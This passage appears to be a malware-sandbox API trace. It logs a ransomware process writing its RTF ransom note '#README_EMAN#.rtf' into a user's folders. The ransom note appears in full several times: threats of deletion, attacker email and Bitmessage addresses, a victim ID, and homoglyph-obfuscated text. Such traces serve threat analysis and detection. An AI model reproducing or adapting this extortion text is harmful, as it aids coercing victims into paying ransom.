br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.700] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.700] CloseHandle (hObject=0x27c) returned 1 [0301.701] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\#readme_eman#.rtf")) returned 0xffffffff [0301.701] GetLastError () returned 0x2 [0301.701] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.701] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.701] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 